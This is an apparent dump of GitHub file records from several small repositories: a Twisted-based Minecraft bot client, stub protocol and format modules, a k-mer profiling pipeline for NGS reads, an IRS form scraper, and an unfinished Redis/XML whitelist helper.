block)\r\n pointer += 1\r\n y = payload.y\r\n #End while y\r\n z = payload.z\r\n #End while z\r\n x = payload.x\r\n #End while x\r\n #End of onLargeUpdate\r\n \r\n def onNOTIMPLEMENTED(self, payload):\r\n print (\"WARN: Packet not yet implemted! (map data)\")\r\n #End of onNOTIMPLEMENTED\r\n\r\n def onKicked(self, payload):\r\n print (\"ERROR: You were kicked from the server. 
Reason: %s\"%payload.message)\r\n #End of onKicked\r\n\r\n def sendMessage(self, message):\r\n self.protocol.send(make_packet(\"chat\", {\"message\": message}))\r\n #End of sendMessage\r\n#End of MinecraftBot\r\n\r\nclass MinecraftProtocol(Protocol):\r\n def __init__(self, bot):\r\n self.bot = bot\r\n self.stats = bot.stats\r\n self.buffer = ''\r\n\r\n self.handlers = {0: self.bot.onPing,\r\n 1: self.bot.onIGNORED, # Login Packet\r\n 2: self.bot.onHandshake,\r\n 3: self.bot.onChat,\r\n 4: self.bot.onIGNORED, # Time Updates\r\n 5: self.bot.onIGNORED, # Equipment update\r\n 6: self.bot.onSpawn,\r\n 13: self.bot.onLocation,\r\n 18: self.bot.onIGNORED, # Arm Animations...\r\n 20: self.bot.onIGNORED, # Player Locations, come back later!\r\n 21: self.bot.onIGNORED, # Entities (?)\r\n 22: self.bot.onIGNORED, # Entities (?)\r\n 23: self.bot.onIGNORED, # Vehicles\r\n 24: self.bot.onIGNORED, # Entities\r\n 28: self.bot.onIGNORED, # Entities\r\n 29: self.bot.onIGNORED, # Entities\r\n 30: self.bot.onIGNORED, # Entities\r\n 31: self.bot.onIGNORED, # Entities\r\n 32: self.bot.onIGNORED, # Entities\r\n 33: self.bot.onIGNORED, # Entities\r\n 34: self.bot.onIGNORED, # Entities\r\n 38: self.bot.onIGNORED, # Unused\r\n 50: self.bot.onPreChunk,\r\n 51: self.bot.onLargeUpdate,\r\n 52: self.bot.onIGNORED, # Multi-Block Updates, come back later!\r\n 53: self.bot.onBlockUpdate,\r\n 103: self.bot.onIGNORED, # Inventory, come back later!\r\n 104: self.bot.onIGNORED, # Inventory, come back later!\r\n 255: self.bot.onKicked\r\n }\r\n #End of __init__\r\n \r\n def dataReceived(self, data):\r\n print (\" We got a packet. \") # DEBUGGING, it appeared stalled.\r\n \r\n self.buffer += data\r\n if (\"data_received\") not in self.stats:\r\n self.stats['data_received'] = 0\r\n self.stats['data_received'] += len(data)\r\n \r\n packets, self.buffer = parse_packets(self.buffer)\r\n\r\n for header, payload in packets:\r\n if (\"packets_received\") not in self.stats:\r\n self.stats['packets_received'] = 0\r\n self.stats['packets_received'] += 1\r\n if header in self.handlers:\r\n self.handlers[header](payload)\r\n else:\r\n print \"Didn't handle parseable packet %d!\"%header\r\n print payload\r\n #End of if, elif, else\r\n #End of for\r\n #End of dataReceived\r\n \r\n def send(self, pkt):\r\n print (\" We sent a packet. \") # DEBUGGING, it appeared stalled.\r\n \r\n self.transport.write(pkt)\r\n if (\"packets_sent\") not in self.stats:\r\n self.stats['packets_sent'] = 0\r\n self.stats['packets_sent'] += 1\r\n if (\"data_sent\") not in self.stats:\r\n self.stats['data_sent'] = 0\r\n self.stats['data_sent'] += len(pkt)\r\n #End of send\r\n \r\n def connectionMade(self):\r\n self.send(make_packet(\"handshake\", {\"username\": username}))\r\n #End of connectionMade\r\n#End of MinecraftProtocol\r\n\r\nclass Connection(ClientFactory):\r\n def __init__(self):\r\n self.stats = {}\r\n self.bot = MinecraftBot(self.stats)\r\n #End of __init__\r\n\r\n def startedConnecting(self, connector):\r\n print (\"DEBUG: startedConnecting...\")\r\n #End of startedConnecting\r\n\r\n def buildProtocol(self, addr):\r\n print (\"INFO: Connected to %s\"%addr)\r\n print (\"DEBUG: Initialising Protocol\")\r\n protocol = MinecraftProtocol(self.bot)\r\n self.bot.protocol = protocol\r\n return protocol\r\n #End of buildProtocol\r\n\r\n def clientConnectionLost(self, connector, reason):\r\n print (\"CRIT: Lost connection. 
Reason: %s\"%reason)\r\n #End of clientConnectionLost\r\n\r\n def clientConnectionFailed(self, connector, reason):\r\n print (\"CRIT: Connection Failed. Reason: %s\"%reason)\r\n #End of clientConnectionFailed\r\n#End of Connection\r\n\r\nif loggedIn:\r\n print (\"DEBUG: Initialising ClientFactory...\") \r\n class GUI(Frame):\r\n def createWidgets(self):\r\n self.FindOres = Button(self)\r\n self.FindOres['text'] = \"Find Ores\"\r\n self.FindOres['fg'] = \"black\"\r\n self.FindOres['command'] = self.FindOres\r\n \r\n self.FindOres.pack({\"side\": \"left\"})\r\n #End of createWidgets\r\n\r\n def FindOres(self):\r\n pass # NOT YET IMPLEMENTED\r\n #End of FindOres\r\n \r\n def __init__(self, master=None):\r\n Frame.__init__(self, master)\r\n self.pack()\r\n self.createWidgets()\r\n #End of __init__\r\n #End of GUI\r\n\r\n# root = Tk()\r\n# tksupport.install(root)\r\n# app = GUI(master=root)\r\n reactor.connectTCP(server, port, Connection())\r\n reactor.run()\r\nelse:\r\n print (\"CRIT: You never successfully logged in, exiting.\")\r\n#End of if, else\r\n"
},
{
"alpha_fraction": 0.6909090876579285,
"alphanum_fraction": 0.6909090876579285,
"avg_line_length": 17.33333396911621,
"blob_id": "00c0aa25cdb3efca8b7813f67c551dc2f9d94ce7",
"content_id": "af468fa3de2d1a4416f9d14029cc1fc4189a0586",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 55,
"license_type": "no_license",
"max_line_length": 46,
"num_lines": 3,
"path": "/construct/protocols/application/ftp.py",
"repo_name": "cbroughton/Crafti",
"src_encoding": "UTF-8",
"text": "\"\"\"\nFile Transfer Protocol (TCP/IP protocol stack)\n\"\"\"\n"
},
{
"alpha_fraction": 0.4736842215061188,
"alphanum_fraction": 0.4736842215061188,
"avg_line_length": 5.666666507720947,
"blob_id": "578ac7d6d36d1957e892d02bf94aeaa3ed95988b",
"content_id": "9b675d1d8143c3434b6c0e5c9ed3ad8559e8c72e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 19,
"license_type": "no_license",
"max_line_length": 11,
"num_lines": 3,
"path": "/construct/protocols/layer3/ipx.py",
"repo_name": "cbroughton/Crafti",
"src_encoding": "UTF-8",
"text": "\"\"\"\nNovel's IPX\n\"\"\""
},
{
"alpha_fraction": 0.7068965435028076,
"alphanum_fraction": 0.7068965435028076,
"avg_line_length": 18.33333396911621,
"blob_id": "0e70bdac7f7c718e1ed2b43f66c39ccfc7d52b08",
"content_id": "aed55c5cd0fa8f98c73a1c74ac60e0e911fb4f57",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 58,
"license_type": "no_license",
"max_line_length": 49,
"num_lines": 3,
"path": "/construct/protocols/application/netbios.py",
"repo_name": "cbroughton/Crafti",
"src_encoding": "UTF-8",
"text": "\"\"\"\nMicrosoft Windows NetBIOS (TCP/IP protocol stack)\n\"\"\"\n"
},
{
"alpha_fraction": 0.6000000238418579,
"alphanum_fraction": 0.6800000071525574,
"avg_line_length": 15.333333015441895,
"blob_id": "2ecc4c23509d69f68ba52fa5655983824d1a0d16",
"content_id": "14a81993294c8245324d82f123334797dfcfe858",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 50,
"license_type": "no_license",
"max_line_length": 40,
"num_lines": 3,
"path": "/construct/formats/filesystem/cdfs.py",
"repo_name": "cbroughton/Crafti",
"src_encoding": "UTF-8",
"text": "\"\"\"\nISO-9660 Compact Disk file system format\n\"\"\"\n\n"
},
{
"alpha_fraction": 0.3636363744735718,
"alphanum_fraction": 0.4545454680919647,
"avg_line_length": 6.333333492279053,
"blob_id": "d3f1825f476b2437203f34e839e2b8ade3f15d6c",
"content_id": "5dbb3aad8768999ca4d062c48a9627b1a544b09a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 22,
"license_type": "no_license",
"max_line_length": 13,
"num_lines": 3,
"path": "/construct/formats/filesystem/fat16.py",
"repo_name": "cbroughton/Crafti",
"src_encoding": "UTF-8",
"text": "\"\"\"\nMS-DOS FAT 16\n\"\"\"\n"
},
{
"alpha_fraction": 0.7169811129570007,
"alphanum_fraction": 0.7169811129570007,
"avg_line_length": 17,
"blob_id": "dbc66c043a79e90a2ccedd931eb0d0e5e9708d29",
"content_id": "0ee2ef130dfc7f1dbaecd1f0369ce2d554a46aed",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 53,
"license_type": "no_license",
"max_line_length": 45,
"num_lines": 3,
"path": "/construct/protocols/application/smtp.py",
"repo_name": "cbroughton/Crafti",
"src_encoding": "UTF-8",
"text": "\"\"\"\nthe Simple Network Management Protocol (SNMP)\n\"\"\""
},
{
"alpha_fraction": 0.6951219439506531,
"alphanum_fraction": 0.7195122241973877,
"avg_line_length": 19.5,
"blob_id": "ed68b35e245a55063eb961ad4b495b23455b6422",
"content_id": "9e013a948e88f3c2a30181a7f79f3d48a02fc300",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 82,
"license_type": "no_license",
"max_line_length": 44,
"num_lines": 4,
"path": "/construct/formats/filesystem/fat12.py",
"repo_name": "cbroughton/Crafti",
"src_encoding": "UTF-8",
"text": "\"\"\"\nFile Allocation Table (FAT) / 12 bit version\nUsed primarily for diskettes\n\"\"\"\n"
},
{
"alpha_fraction": 0.6595744490623474,
"alphanum_fraction": 0.6595744490623474,
"avg_line_length": 14.666666984558105,
"blob_id": "d603ab8b5a56893fe6b793f3b03229cb01c90e33",
"content_id": "36988366b6b0edff73f7e7583ec51d71731764d2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 47,
"license_type": "no_license",
"max_line_length": 38,
"num_lines": 3,
"path": "/construct/protocols/application/irc.py",
"repo_name": "cbroughton/Crafti",
"src_encoding": "UTF-8",
"text": "\"\"\"\nthe Internet Relay Chat (IRC) protocol\n\"\"\"\n"
},
{
"alpha_fraction": 0.5065458416938782,
"alphanum_fraction": 0.5075528621673584,
"avg_line_length": 24.6842098236084,
"blob_id": "450bee62076ca4c0c2dec6602bd41ec6a7c6c150",
"content_id": "e9e593a620b2c2e715ed62186ef1dcf48ec46923",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 993,
"license_type": "no_license",
"max_line_length": 61,
"num_lines": 38,
"path": "/construct/lib/formatter.py",
"repo_name": "cbroughton/Crafti",
"src_encoding": "UTF-8",
"text": "from repr import repr as repr2\n\n\ndef recursion_lock(retval, lock_name = \"__recursion_lock__\"):\n def decorator(func):\n def wrapper(self, *args, **kw):\n if getattr(self, lock_name, False):\n return retval\n setattr(self, lock_name, True)\n try:\n return func(self, *args, **kw)\n finally:\n setattr(self, lock_name, False)\n wrapper.__name__ = func.__name__\n return wrapper\n return decorator\n\n\nclass Formatter():\n def __init__(self, obj):\n self.__obj = obj\n self.__locked = False\n def __repr__(self):\n self.__obj\n def __getattr__(self, name):\n return(self.__obj, name)\n\nclass ReprFormatter(object):\n def __init__(self, subobj):\n self.__subobj = subobj\n self.__locked = False\n def __repr__(self):\n pass\n \n \n obj, nesting, indentation = \" \"):\n items = obj.__introspect__()\n return \n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n"
},
{
"alpha_fraction": 0.5357142686843872,
"alphanum_fraction": 0.5714285969734192,
"avg_line_length": 8,
"blob_id": "e4dc85edbfd9d1e77808f4cc737061211ade8c46",
"content_id": "caef1d2df5793a46bc9570429f1acdfa82b5d911",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 28,
"license_type": "no_license",
"max_line_length": 18,
"num_lines": 3,
"path": "/construct/protocols/ss7stack.py",
"repo_name": "cbroughton/Crafti",
"src_encoding": "UTF-8",
"text": "\"\"\"\nSS7 Protocol Stack\n\"\"\"\n\n"
},
{
"alpha_fraction": 0.5636363625526428,
"alphanum_fraction": 0.5636363625526428,
"avg_line_length": 17.66666603088379,
"blob_id": "4642d802b285e73c4485d44559b55c9fce91e891",
"content_id": "0b5ad9e750cf2aa3675ef5a20678455eeac00617",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 55,
"license_type": "no_license",
"max_line_length": 47,
"num_lines": 3,
"path": "/construct/formats/document/__init__.py",
"repo_name": "cbroughton/Crafti",
"src_encoding": "UTF-8",
"text": "\"\"\"\ndocument file formats (doc, wri, odf, xls, ...)\n\"\"\""
},
{
"alpha_fraction": 0.6458333134651184,
"alphanum_fraction": 0.6458333134651184,
"avg_line_length": 14.666666984558105,
"blob_id": "f9803ffcae8854a4a29ac9a7428c1665e514ff5a",
"content_id": "73a6ecaa25be1f608e21704f986d5d4d0a028b24",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 48,
"license_type": "no_license",
"max_line_length": 38,
"num_lines": 3,
"path": "/construct/formats/document/pdf.py",
"repo_name": "cbroughton/Crafti",
"src_encoding": "UTF-8",
"text": "\"\"\"\nAbode's Portable Document Format (pdf)\n\"\"\"\n\n"
},
{
"alpha_fraction": 0.6226415038108826,
"alphanum_fraction": 0.6603773832321167,
"avg_line_length": 16.33333396911621,
"blob_id": "76b6497cdff4487684ed19cd0f5887f307d2e677",
"content_id": "c99acc7c4300e7285f7f703e5c4fd24a5c2ce5b2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 53,
"license_type": "no_license",
"max_line_length": 43,
"num_lines": 3,
"path": "/construct/protocols/application/pop3.py",
"repo_name": "cbroughton/Crafti",
"src_encoding": "UTF-8",
"text": "\"\"\"\nthe Post Office Protocol v3 (POP3) protocol\n\"\"\"\n\n"
},
{
"alpha_fraction": 0.6915887594223022,
"alphanum_fraction": 0.7102803587913513,
"avg_line_length": 25.75,
"blob_id": "0f3a881b5531a24023217df190d0b2d85871c8e2",
"content_id": "42cbe0b84d6a447d112bf31635bc2afbd1066f6b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 107,
"license_type": "no_license",
"max_line_length": 53,
"num_lines": 4,
"path": "/construct/formats/filesystem/fat32.py",
"repo_name": "cbroughton/Crafti",
"src_encoding": "UTF-8",
"text": "\"\"\"\nFile Allocation Table (FAT) / 32 bit version\nUsed for USB flash disks, old MSWindows systems, etc.\n\"\"\"\n"
},
{
"alpha_fraction": 0.6176470518112183,
"alphanum_fraction": 0.6176470518112183,
"avg_line_length": 10,
"blob_id": "3264d527b89b2fbc10b101b53b5d9c8762064347",
"content_id": "c5db3c364128f1da116ff126c9712e31e50fe586",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 34,
"license_type": "no_license",
"max_line_length": 24,
"num_lines": 3,
"path": "/construct/protocols/application/tftp.py",
"repo_name": "cbroughton/Crafti",
"src_encoding": "UTF-8",
"text": "\"\"\"\nthe Trivial FTP protocol\n\"\"\"\n\n"
}
] | 27 |
neavemj/kmer_tools | https://github.com/neavemj/kmer_tools | 3372f57ebbc04cf922da1c681bf791b69f4386d9 | 4967e81902c16046de2dbeca6386b2fbae5f386f | 76f096769994f2ac00c40ba5a3ea392ad887f83a | refs/heads/master | 2020-03-22T06:38:56.276652 | 2018-10-29T03:45:15 | 2018-10-29T03:45:15 | 139,648,232 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.6237240433692932,
"alphanum_fraction": 0.6402674913406372,
"avg_line_length": 32.7976188659668,
"blob_id": "82a433f02e1ec4827bbcbe92de626aa344e0d2ea",
"content_id": "1881c8a48fe1ca2ad0f725e1b960bdee9aca770c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2841,
"license_type": "no_license",
"max_line_length": 120,
"num_lines": 84,
"path": "/kmer_peak_drawer.py",
"repo_name": "neavemj/kmer_tools",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\n\n# take raw NGS reads, trim, calc kmer peak, and draw graph\n# Matthew J. Neave 21.06.2018\n\nimport argparse\nimport subprocess # use to pass command line calls\nimport os, sys\nimport pandas as pd\nimport matplotlib\nmatplotlib.use(\"Agg\") # avoids 'no display' error\nimport matplotlib.pyplot as plt\n\nfrom quality_check_trim import trimmer\n\n# argparse to collect command line arguments\n\nparser = argparse.ArgumentParser(\"take raw NGS reads, optionally trim, calculate 31-mer peaks, and produce a \"\n \"graph\\nnote: \"\n \"requires trimmomatic and bbmap to be present on the path\\nnote: requires pandas \"\n \"and matplotlib to be installed in python\\nnote: the bbmap step can use a lot of \"\n \"memory (around 70 Gb for a HiSeq lane)\\n\")\n\nparser.add_argument('-1', '--forward_reads', type = str,\n nargs=1, help = \"fastq forward reads\")\nparser.add_argument('-2', '--reverse_reads', type = str,\n nargs=1, help = \"fastq reverse reads\")\nparser.add_argument(\"-s\", \"--stem\", type =str,\n nargs=1, help = \"a stem name for the output, e.g., sample_405\")\nparser.add_argument('--trim', action = 'store_true',\n help = \"perform trimming with trimmomatic?\")\nparser.add_argument('-t', '--threads', type = str,\n nargs=\"?\", default=\"16\", help = \"threads for trimming and khist [default 16]\")\n\nif len(sys.argv) == 1: # if no args are given\n parser.print_help(sys.stderr)\n sys.exit(1)\n\nargs = parser.parse_args()\n\n# check required arguments are provided\n\nif args.forward_reads is None or args.reverse_reads is None or args.stem is None:\n print(\"\\n~~~ required output is missing ~~~\\n\"\n \"~~~ forward reads, reverse reads, and an output stem for file names are required ~~~\\n\")\n parser.print_help(sys.stderr)\n sys.exit(1)\n\n# check that bbmap is loaded\n\ntry:\n tmp = subprocess.call([\"khist.sh\", \"-version\"])\nexcept OSError as e:\n if e.errno == os.errno.ENOENT:\n print(\"\\nkhist could not be found: try 'module load bbmap'\\n\")\n raise\n\n# grab stem name of files for later\n\nstem = args.stem[0]\n\nif args.trim:\n F_read, R_read = trimmer(args, stem)\nelse:\n F_read = args.forward_reads[0]\n R_read = args.reverse_reads[0]\n\n# now use bbmap's khist to draw kmer profile\n\nprint(\"~~~ beginning kmer profile with bbmap ~~~\")\n\nsubprocess.call([\"khist.sh\", \"in=\" + F_read, \"in2=\" + R_read, \"khist=\" + stem + \".khist.txt\", \"threads=\" + args.threads,\n \"k=31\"])\n\n# create a quick graph from the khist file\n# zoom is set to usually work (but might not always)\n\nprint(\"~~~ drawing kmer figure ~~~\")\n\nkhist = pd.read_csv(stem + \".khist.txt\", sep=\"\\t\")\n\nkhist.plot(x=\"#Depth\", y=\"Unique_Kmers\", xlim=[0, 80000], ylim=[0, 1000])\n\nplt.savefig(stem + \".khist.png\", dpi=300)\n\n\n"
},
{
"alpha_fraction": 0.800000011920929,
"alphanum_fraction": 0.800000011920929,
"avg_line_length": 31.5,
"blob_id": "d58250f7d660e1a42a888713c82da97fffbcc775",
"content_id": "f132f214b7a683c3a1e3479cebba54bb7e5aea2b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 65,
"license_type": "no_license",
"max_line_length": 51,
"num_lines": 2,
"path": "/README.md",
"repo_name": "neavemj/kmer_tools",
"src_encoding": "UTF-8",
"text": "# kmer_tools\nSet of utilities for analysing kmer profiles in NGS\n"
},
{
"alpha_fraction": 0.6026595830917358,
"alphanum_fraction": 0.6218085289001465,
"avg_line_length": 36.599998474121094,
"blob_id": "0890d54e14fedab00818dfd2910fa9d4e5c21de7",
"content_id": "4bb0cc5feadd329eeb5e6e834642487a11f7d4a6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1880,
"license_type": "no_license",
"max_line_length": 113,
"num_lines": 50,
"path": "/quality_check_trim.py",
"repo_name": "neavemj/kmer_tools",
"src_encoding": "UTF-8",
"text": "# module to trim Illumina reads as part of kmer profiling\n# Matthew J. Neave 04.07.2018\n\nimport subprocess\nimport os\n\ndef trimmer(args, stem):\n\n \"\"\"\n uses trimmomatic to trim fastq Illumina reads (paired end)\n adapters will be detected in the default CSIRO location\n :param args: argparse object used to grab the F and R reads\n :param stem: stem of the filename used for output file naming\n :return: returns the names of the F and R trimmed files\n :raise: errors will be raised if the adapters can't be found or\n if trimmomatic is not available on the path\n \"\"\"\n # first check that the adapters are accessible\n try:\n adapter_fl = open(\"/apps/trimmomatic/0.36/adapters/TruSeq3-PE-2.fa\")\n adapter_path = \"/apps/trimmomatic/0.36/adapters/TruSeq3-PE-2.fa\"\n print(\"~~~ found adapter files ~~~\")\n except:\n print(\"\\n~~~ could not find adapter file for trimmomatic! ~~~\\n\")\n raise\n\n # check that modules have been loaded\n try:\n subprocess.call([\"trimmomatic\", \"-version\"])\n except OSError as e:\n if e.errno == os.errno.ENOENT:\n print(\"\\ntrimmomatic could not be found: try 'module load trimmomatic'\\n\")\n raise\n\n # create output file names from the stem\n\n F_paired = stem + \"_1P.fastq.gz\"\n F_unpaired = stem + \"_1U.fastq.gz\"\n R_paired = stem + \"_2P.fastq.gz\"\n R_unpaired = stem + \"_2U.fastq.gz\"\n\n ## TRIM READS ##\n print(\"~~~ beginning trimming with trimmomatic ~~~\")\n\n subprocess.check_output([\"trimmomatic\", \"PE\", \"-threads\", args.threads, args.forward_reads[0],\n args.reverse_reads[0], F_paired, F_unpaired, R_paired, R_unpaired, \"ILLUMINACLIP:\" +\n adapter_path +\n \":2:30:10\", \"LEADING:3\", \"TRAILING:3\", \"SLIDINGWINDOW:4:20\", \"MINLEN:50\"])\n\n return(F_paired, R_paired)\n"
}
] | 3 |
loganrobinson315/web-scraper | https://github.com/loganrobinson315/web-scraper | d2614e33757fbb8adf2595aaec19d774b0f74b49 | 6cf95dcf976960e4be18d8eee3537de19063e6da | 4f247536995833c9b0800c169b3f01990e987372 | refs/heads/master | 2023-05-01T01:04:10.681183 | 2021-05-17T13:51:17 | 2021-05-17T13:51:17 | 368,201,474 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.7853773832321167,
"alphanum_fraction": 0.7900943160057068,
"avg_line_length": 55.599998474121094,
"blob_id": "0c813af4846c43908f937288ecf2f7e8b95c6ca7",
"content_id": "6a16f7831ebc78ef541cd74eee12ccda966964fa",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 848,
"license_type": "no_license",
"max_line_length": 111,
"num_lines": 15,
"path": "/README.txt",
"repo_name": "loganrobinson315/web-scraper",
"src_encoding": "UTF-8",
"text": "Thanks for the opportunity to complete your challenge! I have completed this using python 3.9.\nOnce you run the script in the terminal, \nan input box will appear. This will take the form_number you are searching for and this has to be an\nexact match. ex(Form W-2) Once you enter in an exact match, the the source URL will dynamically update for the \nrequested results and returned as JSON in the terminal. After reviewing the results, simply enter y \nto continue to download any files. The program will promt you for a parameter of years. Start by entering \nthe lowest year(enter) then the highest year(enter) you would like to download. After the download is \ncomplete. Simply re-run the script to explore/download any other files. \n\n\n\nbeautifulsoup4 will be required to run this program along with request and lxml.\n\n\nExited to hear any feedback!"
},
{
"alpha_fraction": 0.5511934757232666,
"alphanum_fraction": 0.5574748516082764,
"avg_line_length": 36.71428680419922,
"blob_id": "b05719589af34d7ab783053e44dc1f4178ae3fbd",
"content_id": "69aea93e5eae6b792499a35ee359bf5fbc04f5ac",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3184,
"license_type": "no_license",
"max_line_length": 217,
"num_lines": 84,
"path": "/pinwheel.py",
"repo_name": "loganrobinson315/web-scraper",
"src_encoding": "UTF-8",
"text": "from bs4 import BeautifulSoup\nimport requests\nfrom datetime import date\nimport itertools\nimport json \n\n\ndef gather_info():\n search_term = val.replace(\" \", \"+\")\n print(search_term)\n source = requests.get(f'https://apps.irs.gov/app/picklist/list/priorFormPublication.html?resultsPerPage=200&sortColumn=sortOrder&indexOfFirstRow=0&criteria=formNumber&value={search_term}&isDescending=false',).text\n soup = BeautifulSoup(source, 'lxml')\n # file_number = soup.find_all('th', {'class':'ShowByColumn'})\n for table in soup.find_all('tr', {'class':['even','odd']}):\n if table.td(text={val}):\n form_number = table.td.text\n form_title = table.find('td', class_='MiddleCellSpacer').text\n \n for table in soup.find_all('tr', {'class':['even','odd']}):\n if table.td(text={val}):\n output = []\n min_years = table.find('td', class_='EndCellSpacer').text.split()\n my_min_year = 9999\n my_max_year = 0000\n for i in min_years:\n my_year = int(i)\n if my_year < my_min_year:\n my_min_year = my_year \n \n for table in soup.find_all('tr', {'class':['even','odd']}):\n if table.td(text={val}):\n output = []\n min_years = table.find('td', class_='EndCellSpacer').text.split()\n for i in min_years:\n my_year = int(i)\n if my_year > my_max_year:\n my_max_year = my_year\n x = {\n \"form_number\": form_number.strip(),\n \"form_title\": form_title.strip(),\n \"min_year\": my_min_year,\n \"max_year\": my_max_year,\n }\n \n\n y = json.dumps(x)\n\n print('Here is the info for', val)\n print()\n print(y)\n print()\n\n \ndef download():\n search_term = val.replace(\" \", \"+\")\n # print(search_term)\n source = requests.get(f'https://apps.irs.gov/app/picklist/list/priorFormPublication.html?resultsPerPage=200&sortColumn=sortOrder&indexOfFirstRow=0&criteria=formNumber&value={search_term}&isDescending=false',).text\n soup = BeautifulSoup(source, 'lxml')\n links = soup.find_all('a')\n i = 0\n if answer == \"y\": \n for link in links:\n for year_number in range(start_number, end_number+1):\n if link(text={val}):\n if ('.pdf' and str(year_number) in link.get('href', [])):\n i += 1\n print(\"Downloading file: \", i)\n response = requests.get(link.get('href'))\n pdf = open(val+\"-\"+str(year_number)+\".pdf\", 'wb')\n pdf.write(response.content)\n pdf.close()\n print(\"File \", i, \" downloaded\")\n print('downloaded')\n else:\n print('does not exist')\n\n \nprint('Welcome!')\nval = input(\"Please enter a Form Value (This needs to bee an exact match): \")\ngather_info()\nanswer = input(\"Lets download the files, enter y to continue:\")\nstart_number = int(input(\"Please enter a START year you would like to download: \"))\nend_number = int(input(\"Please enter an END year you would like to download: \"))\ndownload()\n \n\n\n\n\n\n\n\n\n\n\n\n"
}
] | 2 |
ketwang/saltstack | https://github.com/ketwang/saltstack | cd35dff96cb36372fd3a285c67c0f20f0d445259 | 8b5f0d8068f3f7c8c0a2ea3cc476bad96e699565 | 869c42c7035daaa88e0b91c90456f8810fbf146a | refs/heads/master | 2016-08-10T11:29:04.167351 | 2016-02-26T09:15:14 | 2016-02-26T09:15:14 | 50,557,364 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.7053139805793762,
"alphanum_fraction": 0.7053139805793762,
"avg_line_length": 24.875,
"blob_id": "ffd2d49471a3b8e878c78b0e807b28ec853dd861",
"content_id": "9898e475f6424fd7c84bb0c0705a84ebb50aa2e6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 207,
"license_type": "no_license",
"max_line_length": 41,
"num_lines": 8,
"path": "/salttask/getModules.py",
"repo_name": "ketwang/saltstack",
"src_encoding": "UTF-8",
"text": "import xml.dom.minidom\nclass service(object):\n\tdef __init__(self):\n\t\tself.filePath = 'config_d/services.xml'\n\tdef getServiceXmlFile(self):\n\t\twith open(self.filePath) as fd:\n\t\t\tdata = fd.read()\n\t\treturn data\n"
},
{
"alpha_fraction": 0.5595126748085022,
"alphanum_fraction": 0.5682598948478699,
"avg_line_length": 34.56666564941406,
"blob_id": "2665731081a53ad8fa187aee80c8b398c1f6bead",
"content_id": "62cc0b922add7c47661b1fefd522cfd9c14df89f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3255,
"license_type": "no_license",
"max_line_length": 100,
"num_lines": 90,
"path": "/util/getWhiteList.py",
"repo_name": "ketwang/saltstack",
"src_encoding": "UTF-8",
"text": "import xml.dom.minidom\n\"\"\"这里要实现白名单的维护与删除\n这里后续考虑用数据库来记录\n\"\"\"\nimport redis\n\nredisconfig = {'host': 'salt-master-test.idcvdian.com'\n 'port': 6379,\n 'db': 0\n\t}\n\nclass handleWhiteListRedis(obejct):\n\tdef __init__(self):\n\t\tself.host = redisconfig['host']\n self.port = redisconfig['port']\n self.db = redisconfig['db']\n def __enter__(self):\n \tconn = redis.Redis(host=self.host, port=self.port, db=self.db)\n \treturn conn\n def __exit(self, p1, p2, p3):\n \tconn.close()\n\nclass handleWhiteListXmlFile(object):\n def __init__(self):\n self.path = 'config.d/whiteList.xml'\n self.xmlDocument = xml.dom.minidom.parse(self.path)\n self.root = self.xmlDocument.documentElement\n print dir(self.xmlDocument)\n def getWhiteIPList(self):\n record={}\n #xmlDocument = xml.dom.minidom.parse(self.path)\n #root = xmlDocument.documentElement\n for item in self.root.childNodes:\n if item.nodeName == 'host':\n _ = item.getElementsByTagName('ip')[0], item.getElementsByTagName('reason')[0]\n #print _\n record[_[0].childNodes[0].data] = _[1].childNodes[0].data\n elif item.nodeName == 'hostSet':\n _ = item.getElementsByTagName('ipSet')[0], item.getElementsByTagName('reason')[0]\n #print _\n record[_[0].childNodes[0].data] = _[1].childNodes[0].data\n return record\n def deleteIP(self, type_, value):\n if type_ == 'host':\n key_word = 'ip'\n else:\n key_word = 'ipSet'\n for item in self.root.getElementsByTagName(type_):\n if value == item.getElementsByTagName(key_word)[0].childNodes[0].data:\n self.xmlDocument.removeChild(item)\n break\n with open(self.path, 'w+') as fd:\n self.xmlDocument.writexml(fd, addindent=' ', newl='', encoding='utf-8')\n\n def appendIP(self, type_, key, value):\n if type_ == 'host':\n tp = self.xmlDocument.createElement(type_)\n\n k = self.xmlDocument.createElement('ip')\n k.appendChild(self.xmlDocument.createTextNode(key))\n else:\n tp = self.xmlDocument.createElement(type_)\n\n k = self.xmlDocument.createElement('ip')\n k.appendChild(self.xmlDocument.createTextNode(key))\n\n\n v = 